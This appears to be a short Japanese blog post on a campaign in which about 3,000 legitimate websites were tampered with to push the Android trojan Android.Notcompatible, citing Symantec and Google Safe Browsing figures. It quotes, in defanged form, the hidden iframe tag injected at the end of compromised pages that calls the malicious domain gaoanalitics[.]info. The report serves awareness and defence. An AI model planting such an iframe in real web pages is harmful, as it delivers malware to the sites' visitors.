サイト改ざん「gaoanalitics info」約3,000件 Androidマルウェア感染


Windowsユーザーではなく、スマートフォンのAndroid端末をターゲットとした正規サイトの大量改ざん攻撃。日本の一般サイトでも複数殺られてる感じ?


・ Android を狙うトロイの木馬と連動した Web サイトインジェクション攻撃 (Symantec)
・ 配信されるAndroidマルウェア Android.Notcompatible


改ざん被害を受けてるページの最後尾に下のような不審なIFRAMEタグ(インラインフレーム)が挿入されてます。Android端末だと、.apkファイルなウイルスが自動的にダウンロードされてしまうっぽい。(それをインストールしないと感染状態にはならない)


<iframe style="visibility: hidden; display: none; display: none;" src = "https // gaoanalitics[.]info/ ?id={*****}"></iframe>


Google Safe Browsing機能で ”攻撃サイト” (このサイトはコンピュータに損害を与える可能性があります)として判定してるドメイン 「gaoanalitics[.]info」 の改ざん数を見てみる


この記事を書いてる時点で 『過去 90 日間に不正なソフトウェアのホスティングが行われ、3053 個のドメインへの感染が判明』 との情報だった。



www.google.com/safebrowsing/diagnostic?hl=ja&site=gaoanalitics.info